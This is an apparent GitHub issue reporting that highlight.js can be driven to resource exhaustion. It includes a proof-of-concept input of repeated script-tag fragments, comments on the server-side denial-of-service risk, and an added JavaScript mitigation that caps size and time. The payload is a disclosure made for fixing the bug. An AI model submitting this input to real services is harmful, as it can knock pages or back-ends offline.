Open
Describe the issue/behavior that seems buggy
While testing our code, we found that we could make our 'markdown editor' crash.
After some additional research, I found that the highlighting caused it.
I also decided to test the POC on the demo page of highlight.js, and there it also uses a lot of resources.
The browser will eventually show the 'This page isn't responding' pop-up.
Sample Code or Instructions to Reproduce
<body>
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
</body>
Expected behavior
Page doesn't crash
Additional context
I submitted this to security@highlightjs.org, but didn't get any response.
This can be used to impact the availability of a webpage.
Title changed from "Client side resource exhausting" to "Resource exhausting"
ErazerBrecht commented on May 14, 2025
If people use this package in their back-ends (NodeJS, PDF generators, ...), this will cause load on their infrastructure, eventually resulting in a denial of service.
Title changed from "Resource exhausting" to "Resource exhaustion"
joshgoebel commented on May 28, 2025
Which grammar choice results in the bad behavior?
sporkmonger commented on Jun 13, 2025
The original payload won't trigger it for all grammars. I'll send an email to security@highlightjs.org with the list of vulnerable grammars and a minimal reproduction PoC that includes another payload that will trigger the vulnerability for a longer list.
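For the back-end case raised in this thread, one mitigation is to cap the input size and the time given to the highlighter, falling back to escaped plain text when either limit is hit. The following is an added example, not code from highlight.js or from the commenters; `safeHighlight`, `highlightFn` and the limit values are hypothetical, and it assumes a synchronous highlighter running on Node.js.

```javascript
// Added example: time-boxed, size-capped highlighting for server-side use.
const vm = require('node:vm');

// Escape text so the fallback can be placed in HTML without highlighting.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// highlightFn (hypothetical name): any synchronous (code) => html function,
// for example a thin wrapper around the highlighter the service uses.
function safeHighlight(highlightFn, code, opts = {}) {
  const { maxBytes = 100000, timeoutMs = 200 } = opts; // assumed limits

  // Cheap guard first: never hand oversized input to the highlighter.
  if (Buffer.byteLength(code, 'utf8') > maxBytes) {
    return { html: escapeHtml(code), highlighted: false, reason: 'too-large' };
  }

  try {
    // The vm watchdog terminates synchronous execution after timeoutMs,
    // including time spent inside highlightFn. This is a time budget only;
    // it does not sandbox highlightFn, which still runs with full privileges.
    const html = vm.runInNewContext(
      'fn(input)',
      { fn: highlightFn, input: code },
      { timeout: timeoutMs },
    );
    return { html: String(html), highlighted: true, reason: null };
  } catch (err) {
    if (err && err.code === 'ERR_SCRIPT_EXECUTION_TIMEOUT') {
      // Degrade to plain escaped text instead of stalling the process.
      return { html: escapeHtml(code), highlighted: false, reason: 'timeout' };
    }
    throw err; // Unrelated highlighter errors are not swallowed.
  }
}
```

The call still blocks the event loop for up to `timeoutMs`; a service that highlights many untrusted inputs concurrently would move the same logic into a worker thread or separate process and log the `timeout` results for review.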